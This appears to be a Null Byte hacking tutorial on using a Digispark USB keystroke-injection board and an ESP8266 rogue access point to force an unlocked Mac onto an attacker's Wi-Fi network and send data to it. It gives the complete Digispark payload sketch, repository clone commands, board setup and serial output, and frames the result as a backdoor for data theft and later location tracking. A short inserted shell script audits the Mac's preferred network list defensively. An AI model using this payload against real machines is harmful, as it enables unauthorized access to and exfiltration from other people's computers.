Creation of MacOS payloads to insert a Wi-Fi backdoor «Null Byte :: WonderHowTo
Arduino is a language that is easy to learn and supported on many incredibly inexpensive devices. Two of them are the Digispark for $2 and an ESP8266-based board for $3. We can program these devices in Arduino to hijack the Wi-Fi data connection of any unlocked MacOS computer in a matter of seconds, and we can even send data from the target device to our low-cost evil access point.

Arduino-compatible devices continue to lower the barrier to building cheap prototypes, and prototyping new kinds of Wi-Fi and USB Rubber Ducky-style attacks is no different. By leveraging the trust that a Mac has in its "preferred" Wi-Fi networks, we can quickly establish a backdoor connection with a Digispark USB payload and send data from the target Mac to our ESP8266 web server.

What is a list of preferred networks?

Every time you connect to a Wi-Fi network, your device adds the network to a list of trusted Wi-Fi networks called the Preferred Network List (PNL). The list keeps your computer connected to Wi-Fi while you switch between networks. For convenience, most operating systems automatically connect to these networks by default to provide a seamless experience. However, it does open up some opportunities that attackers can take advantage of.

By adding a rogue network to the PNL, we can force a device to connect to a malicious AP whenever we want. For example, we can steal data from the device without having to set up a server on the internet. Instead, we can kick the user off their current hotspot and know that they will connect to ours and not the real one. In a later guide, we'll build on that to steal the target's Wi-Fi connection history and track the target's location every 60 seconds.
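From the defender's side, the PNL is also where this attack leaves a trace. As an added example (not code from the original article), the script below reads the list that `networksetup -listpreferredwirelessnetworks` prints on macOS, compares it with an allowlist of expected SSIDs and reports any entry that should not be there; the interface name, the allowlist and the sample output are assumptions.

```shell
#!/bin/sh
# Audit the macOS Preferred Network List (PNL) against an allowlist of SSIDs.
# Added example for this article, not code from the original post. It assumes
# macOS `networksetup` for a live run; the constructed sample below runs anywhere.

IFACE="${IFACE:-en0}"

# SSIDs this machine is expected to auto-join (assumption: edit for your own fleet).
ALLOWED="HomeNet
OfficeWiFi"

# Turn `networksetup -listpreferredwirelessnetworks` output (a header line, then
# one indented SSID per line) into one SSID per line with no indentation.
parse_pnl() {
    sed -e '1d' -e 's/^[[:space:]]*//' -e '/^$/d'
}

# Print every SSID in the given PNL text that is not on the allowlist.
unexpected_ssids() {
    printf '%s\n' "$1" | parse_pnl | while IFS= read -r ssid; do
        if ! printf '%s\n' "$ALLOWED" | grep -Fxq -- "$ssid"; then
            printf '%s\n' "$ssid"
        fi
    done
}

# Constructed sample of networksetup output; Chicken_Medium_06 is the kind of
# rogue-AP entry this article's payload leaves behind.
SAMPLE_PNL="Preferred networks on en0:
	HomeNet
	Chicken_Medium_06
	OfficeWiFi
	CableWiFi"

if [ "${1:-}" = "--live" ]; then
    # Live run on macOS: report unexpected entries and the command that removes each.
    unexpected_ssids "$(networksetup -listpreferredwirelessnetworks "$IFACE")" |
    while IFS= read -r ssid; do
        echo "unexpected preferred network: $ssid"
        echo "  remove with: networksetup -removepreferredwirelessnetwork $IFACE '$ssid'"
    done
else
    echo "Unexpected SSIDs in the constructed sample PNL:"
    unexpected_ssids "$SAMPLE_PNL"
fi
```

Run it with `--live` on a Mac to audit the real PNL; without the flag it only checks the constructed sample.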

Adding an evil AP with Arduino

We'll use two extremely inexpensive devices to demonstrate what can be done on a limited budget. The first device is a Digispark, a small Arduino-programmable USB development board that is capable of entering Ducky Script-like commands by posing as a keyboard. The attacker can write a payload for each operating system and feed it to an open and unlocked computer in a matter of seconds.

The second part of our attack is carried out with an ESP8266 Wi-Fi development board like the D1 Mini, which is also programmable in Arduino. This creates the evil AP that our target computer connects to. We connect the board to our computer over serial in order to receive the data sent from the target computer via Wi-Fi and print it on the screen.

Together, these two devices perform a data exfiltration attack: the ESP8266 creates a network, and the Digispark script forces the victim to connect to it. Once the connection is made, we can do a lot in the background using the ESP8266 to steal data or remotely control the computer. In this simple example, we send the output of a command to show that we can get data off the device, but we'll get more creative with the payload in the next guide.

What You Will Need

We're going to use a pair of Arduino devices for about $5 total, so the budget here is very small (not counting the MacOS computer to test the payload on). First you need a Digispark board. Now that they are very popular, they are made by many different manufacturers, so you can easily find what you need. One of the cheapest clones you can get is on AliExpress for less than two dollars, but you'll have to wait a long time for it to arrive. If you're more of an Amazon buyer, they also have some that ship faster, but the cost is higher.

You also need an ESP8266-based board like a simple D1 Mini, which can be found on AliExpress for less than three dollars. You'll need to install a driver for it, but if you want a nicer D1 Mini that doesn't require a driver and lets you swap antennas, AliExpress offers one for a few dollars more. Again, delivery will take some time, but Amazon offers faster shipping options for a bit more money. You can also use other ESP8266-based boards like the NodeMCU, but I recommend the D1 from personal experience.

Optionally, you can add a red LED and a 330 ohm resistor. You can follow the instructions for The Chicken Man Game or the instructions below to see which pin is connected to what. Apart from all of this, you need a micro USB cable to communicate with the D1 Mini.

Step 1: Setting up the Arduino IDE for the ESP8266 & Digispark

First we have to set up the Arduino IDE to work with the Digispark board and the ESP8266. To do this, open the Arduino IDE and open the app's "Settings". On the Settings tab, look for the "Additional Boards Manager URLs" field and paste the following URLs.

  http://arduino.esp8266.com/stable/package_esp8266com_index.json, http://digistump.com/package_digistump_index.json

Click "OK" and you should be able to find the relevant boards to select under the Boards Manager. Under "Tools", click "Board" and then "Boards Manager" to display the list of installed boards. The board packages we need to install are the ESP8266 and the Digispark. First, find and install "esp8266" by ESP8266 Community.

Then find and install "Digistump AVR Boards" by Digistump, which contains the Digispark.

Once installed, we should be able to upload from the Arduino IDE to both boards.

Step 2: Open the Sketch & Flash the ESP8266 Rogue AP

Now that we can upload to the ESP8266, we fetch the sketch from its GitHub repository and open it in the Arduino IDE. Run the following command in a new terminal window to download the scripts.

  ~# git clone https://github.com/skickar/ChickenManGame.git

  Cloning into 'ChickenManGame'...
  remote: Enumerating objects: 246, done.
  remote: Counting objects: 100% (246/246), done.
  remote: Compressing objects: 100% (194/194), done.
  remote: Total 613 (delta 117), reused 168 (delta 52), pack-reused 367
  Receiving objects: 100% (613/613), 4.85 MiB | 4.81 MiB/s, done.
  Resolving deltas: 100% (285/285), done.

In this first example, we use the rogue AP sketch I wrote for a Wi-Fi capture-the-flag game called The Chicken Man Game. In our follow-up guides, we add a sketch for the ESP8266 that creates a server for data exfiltration and tracking. To open the test sketch, cd from a terminal window to the directory where your Arduino sketches are saved.

  ~# cd ChickenManGame
  ~/ChickenManGame# open ChickenManGame.ino

This should open the ChickenManGame sketch in the Arduino IDE. We test our script by turning on a red LED, demonstrating that the target MacBook has connected to our evil access point and sent it data.

If you have a red LED and a resistor, connect the positive leg of the LED to pin D1 of the D1 Mini and the negative leg to a 330 ohm resistor. Connect the other end of the resistor to ground. If you don't add an LED, just keep an eye on the serial output to see when data from the target device arrives at our rogue AP.

With the ESP8266 connected over the micro USB cable, select the correct board from the "Tools" dropdown menu (D1 Mini for me) and configure your settings as follows.

If everything looks correct, press the arrow at the top left of the IDE to upload the sketch to the ESP8266. When it is finished, press Command-Shift-M to open the serial monitor. From here, the rogue AP starts and reports a unique Wi-Fi name and password. You should see output like the one below.

  Mode: chicken
  Resuscitated bird
  Search for networks
  Jimmy's BEAUTY - VALUABLE!
  CableWiFi - VALUABLE!
  SpectrumWiFi - VALUABLE!
  SpectrumWiFi - VALUABLE!
  YOUNG X - VALUABLE!
  Feet 2.4 GHz - VALUABLE!
  DG1670A72 - VALUABLE!
  GoGo Spot - VALUABLE!
  WIFIEA18FDPlus - VALUABLE!
  ID set to 6
  --------------------------------------------
  Flag: 0
  Chicken Level: Medium
  Chicken ID: 6
  Channel: 7
  MAC address: 18:FE:34:00:01:06
  IP address: 192.168.4.1
  SSID: Chicken_Medium_06
  Password: aardvark
  -----------------------------------------

If you scan for Wi-Fi networks on your phone or computer, you should see one with the name shown after "SSID". Save the network name and password for the next step. Also leave this serial window open, as it will show when the web request from the target arrives.

Step 3: Open & Flash the Digispark HID Payload

Next we configure the Digispark part of the attack. To download the script, do the following in a new terminal window:

  ~# git clone https://github.com/skickar/DigiTrack.git

  Cloning into 'DigiTrack'...
  remote: Enumerating objects: 70, done.
  remote: Counting objects: 100% (70/70), done.
  remote: Compressing objects: 100% (70/70), done.
  remote: Total 70 (delta 41), reused 0 (delta 0), pack-reused 0
  Unpacking objects: 100% (70/70), done.

Then change to the directory and open the test sketch.

  ~# cd DigiTrack
  ~/DigiTrack# open chickentest.ino

You will be asked whether the chickentest.ino sketch should be moved into a new folder. Once you do this, the following sketch should be open in the Arduino IDE.

  #include "DigiKeyboard.h"

  void setup() {}

  void loop() {
    DigiKeyboard.delay(2000);
    DigiKeyboard.sendKeyStroke(0);
    // Cmd-Space opens Spotlight; type "Terminal" and press Enter to launch it
    DigiKeyboard.sendKeyStroke(KEY_SPACE, MOD_GUI_LEFT);
    DigiKeyboard.delay(600);
    DigiKeyboard.print("Terminal");
    DigiKeyboard.sendKeyStroke(KEY_ENTER);
    DigiKeyboard.delay(5000);
    // join the rogue AP; WIFINAME and PASS are replaced with the values from Step 2
    DigiKeyboard.print("networksetup -setairportnetwork en0 'WIFINAME' PASS");
    DigiKeyboard.delay(1000);
    DigiKeyboard.sendKeyStroke(KEY_ENTER);
    DigiKeyboard.delay(6000);
    // request to the ESP8266 web server that shows the connection worked
    DigiKeyboard.print("curl -X POST 192.168.4.1/index.html?cmd=led+red");
    DigiKeyboard.delay(1000);
    DigiKeyboard.sendKeyStroke(KEY_ENTER);
    DigiKeyboard.delay(5000);
    for (;;) { /* empty */ }  // run once, then idle
  }

In the "WIFINAME" and "PASS" placeholders, enter the name and password of the rogue AP you created. In our example, we would change the line as follows:

  DigiKeyboard.print("networksetup -setairportnetwork en0 'Chicken_Medium_06' aardvark");

After making the change, select the Digispark from the drop-down list of boards.

Make sure the Digispark is unplugged, and then click the upload button. You have 60 seconds to plug in the Digispark. When you do, the Micronucleus bootloader uploads the code to the Digispark, and you can unplug it when the following is displayed.

  Running: 100% complete
  >> Micronucleus done. Thank you!

Make sure that you unplug the Digispark immediately after flashing. Otherwise the payload will execute after a second or two.

Step 4: Monitor the ESP8266 Serially & Insert the Payload

We now have a rogue AP created by the ESP8266, which we are monitoring over serial, and a payload ready and waiting on our Digispark. It's time to try the payload on the target Mac!

Insert the Digispark into the Mac and you should see the payload type the following.

  networksetup -setairportnetwork en0 'Chicken_Medium_06' aardvark
  curl -X POST 192.168.4.1/index.html?cmd=led+red
  LAY YOUR EGG Red team Green team Blue team

See red?

Cover photo and screenshots from Kody / Null Byte
